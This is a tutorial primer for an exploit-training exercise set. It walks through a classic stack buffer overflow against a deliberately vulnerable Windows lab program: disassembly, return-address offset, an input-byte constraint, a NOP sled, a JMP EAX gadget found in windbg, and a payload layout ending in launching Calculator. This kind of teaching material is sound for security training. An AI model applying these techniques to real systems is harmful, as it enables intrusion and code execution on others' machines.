Advanced Windows Buffer Overflows
AWBO Exercises Primer
If you haven't worked with exploitation before or are not sure how to set up your environment for the AWBO exercises, follow this simple walkthrough example using a short exploitable C program.
Things you'll need:
- A disassembler
- A method of delivery
- A debugger
a) Figure out how the program works.
Familiarize yourself with the logic of the program. Some noteworthy things in particular are:
- Size of stack space created
- Offsets and functions of stack variables
- Calls to subroutines
- Types of input (streams, arguments)
- Branching of execution/jmp statements
Next, look at the executable's disassembly. You can use IDA or anything that'll get the job done.
When reading assembly, especially if you're more accustomed to high-level languages like C, you'll want to avoid trying to absorb the code instruction-by-instruction. Look at blocks of instructions to figure out how they work together to do something useful.
In the example program:
Blocks like this are typical. When a function is called (in this case, our main), the address of the next instruction after call is saved on the stack. This is called the "return address"; once the function terminates, this address lets the processor know where to resume execution.
Once the return address is pushed, the old ebp is also pushed onto the stack and our old ESP becomes the new EBP. Once that's done, space is reserved on the stack for local variables. In this case, the size of the stack space created is 100 hex (256 bytes).
Furthermore, IDA shows us the offsets of important variables/locations in that reserved space that will be used later by the program. This is displayed above the start of main.
These are also good to take note of for when they're referenced later.
b) What kind of vulnerability are we looking at? How and where is the program exploitable?
The next thing to look for are areas where the program could potentially be vulnerable. For stack-based buffer overflows, this will take the form of user input that is copied into the stack without validating whether there is enough space reserved for it. String functions like strcpy(), for instance, don't inherently provide for any sort of bounds checking beyond null-character termination and are typically exploitable.
Our first function call is a call to
As we can see, EAX is loaded with the address of buffer and then supplied as an argument to the gets() call. Since user input will be copied into buffer (on the stack) from stdin with no bounds checking, this looks like a good candidate for a stack-based buffer overflow vulnerability.
From earlier, we know that Buffer is located at a 100 hex offset from EBP, or EBP-100. Our saved return address is located at EBP+4, starting 268 bytes higher than Buffer. In order to cleanly overwrite it with our own data, we'll need to supply Buffer with 260 + 4 bytes = 272.
c) What obstacles and constraints on input are we faced with?
Successful exploitation hinges on hijacking EIP, but even if you've overwritten the return address on the stack, execution will not be yours until you hit your RET instruction. Though a seemingly trivial point, it bears mentioning that this means you'll need to make sure execution doesn't terminate or branch off before you gain control. Input will need to be crafted such that the necessary execution conditions are satisfied.
The first block compares the byte at EBP-FD(-253 decimal) with the hex value 78 (ASCII 'x'). If they match, execution then jumps over the second block entirely, which is an exit call. Allowing the program to call exit() will prematurely terminate the program, which is very bad for us; execution will never arrive at the RET instruction we're relying on to pop our overwritten return address off the stack and into EIP.
Given this observation, it's safe to say that we need to make the byte at EBP-FD to be lowercase 'x'. EBP-FD is also the fourth byte of our Buffer, which is fed through standard input. In order for our exploitation to succeed, we'll need to feed 'x' as the fourth character in our payload.
Method of Delivery:
a) Delivering your shellcode.
Shellcode is delivered in the form of hex byte instructions written for the target platform. This can be defined as a hex string in your scripting language of choice, most often using the \xNN format. Perl is highly recommended - strings are easily created and appended to one another, and you can use perl's print() function in conjunction with the pipe operator "|" in cygwin to pump your shellcode output to the exploitable program.
Cygwin is a linux-like shell environment for Windows. When setting up cygwin, you also have the option of installing various packages. Make sure you get perl and gcc.
Then from the command line:
or, you can run perl code from the command line with the -e switch:
Furthermore, while it's not necessary for this example, you can also pass the output of a perl scripts as arguments from the command line, in which case you'll need to enclose each statement within ticks (`), located on the same key as tilde (~):
b) Structure your payload to work with the constraints on input and satisfy conditions of execution.
We know from our disassembly that the fourth character we supply to our vulnerable program needs to be lowercase 'x' (0x78). After that, we have 256 bytes to fill before we overwrite the return address. What a fantastic place to put your shellcode! It will, however, need to be padded; the shellcode is only 127 bytes.
The most commonly used padding tends to be what are called "NOP instructions". NOP instructions are instructions that perform either no operation or one that will not really interfere with the operation of our shellcode. The latter is, of course, context-dependent. The most common are 0x90 (NOP - does nothing) and 0x41 (Both ASCII "A" AND inc ecx, depending on whether it's interpreted as data or an instruction). The fact that they're single-byte instructions makes them ideal for plugging up holes. Not only that, but if you miss your shellcode and EIP lands somewhere on your padding before your shellcode, the processor will execute these NOP instructions one-by-one until it gets to the beginning of your shellcode. This technique is called a "NOP sled".
a) Setting up windbg as your post-mortem debugger.
You can register windbg as your port-mortem debugger with the -I option. In Win 2000, you'll want to select "run" from the start menu, browse for the location of windbg (usually debugging tools for Windows), and then append -I as an argument:
Post-mortem means that when a program throws an exception (for example, crashes), Windows will give the debugger a chance to deal with it before passing it to an exception handler. So, say you overwrite the return address on the stack with "AAAA"; this will cause an Access Violation when the processor tries to resume execution at address 0x41414141, and your debugging environment will fire up automatically.
To make things a little easier to debug, an INT 3 instruction has been added near the beginning of the program. When you execute the program, it'll pop up your debugger automatically, allowing you to step through your code from near the beginning. For more information on how to set up your windbg environment, as well as an explanation of useful commands, check out the windbg cheatsheet: Windbg cheatsheet
The commands you'll probably use most for this exercise are p and t (step over/step into respectively), bp 0xNNNNNNNN (set breakpoint at address 0xNNNNNNNN), and g (continue to next breakpoint).
b) Testing hypotheses by observation of stack behavior/registers.
You won't always succeed in popping a shell on the first try. Don't despair!
First, focus on owning EIP. Keep an eye on the stack. Observe its behavior at several different points of execution as well as its effect on the location of your saved return address. Try first overwriting it with ASCII to see if you manage to cause an access violation, then use a separate 4-byte string, once that's distinguishable from other padding (if your padding is A's, try "BBBB"), and place it at the point in your payload where you -think- you'll be overwriting the return address. This will ensure that you're not overshooting the return address completely.
If you're still not getting EIP and you swear you've provided enough characters to cause an overflow, the problem may lie in the execution. Try stepping through the program with the debugger to see if you ever reach your RET instruction; maybe something was overlooked. For example, our program calls exit() unless 'x' is the 4th byte of our payload.
c) Dealing with non-stack addresses.
One of the victory conditions for these awbo exercises is that you must successfully exploit the program without explicitly referencing any stack addresses. In other words, the return address should not be overwritten with an address on the stack, but you may use any other address in memory.
Remember -- data is just data; it's how it's interpreted that's important, and there are other ways to get to the stack. The stack address you need to jump to might still be in one of your registers, or even on the stack itself. If only there were some instruction in memory you could use to your advantage... Hmm...
In our example program, if you set a breakpoint at the address of RET (bp 0x00401038 for me) and examine your registers, you'll notice something: the address of the first byte of our buffer happens to be sitting in the EAX register. A JMP EAX instruction would get us there painlessly. All we need to do is find it in memory.
You can search for bytes, words, doublewords and ASCII in windbgwith the "s" command. The syntax is listed in the windbg cheatsheet:
The instruction JMP EAX is FF E0 in hex. You can figure out the hex representation of an instruction in windbg with the "a" command. Hit enter, then type your instruction in assembly.
So let's do a search for the two-byte pattern ff and e0 with the "s" command. When using the search command this way, you don't need to worry about endianness:
Let's use the first address, 0x002b4058.
Remember, addresses need to be fed to the payload in reverse-byte order because of the little-endianness of x86 architecture.
So now, your payload should look something like this:
"AAAx" satisfies our requirement that the 4th byte be "x".
'$filler' is our padding.
'$shellcode' is the code that will actually be executed.
"\x58\x40\x2b\x00" is the address of our JMP EAX instruction, fed to the program in reverse-byte order because of little-endianness.
Just pipe it to your program, run 'g' from the windbg command line and voila! Calculator!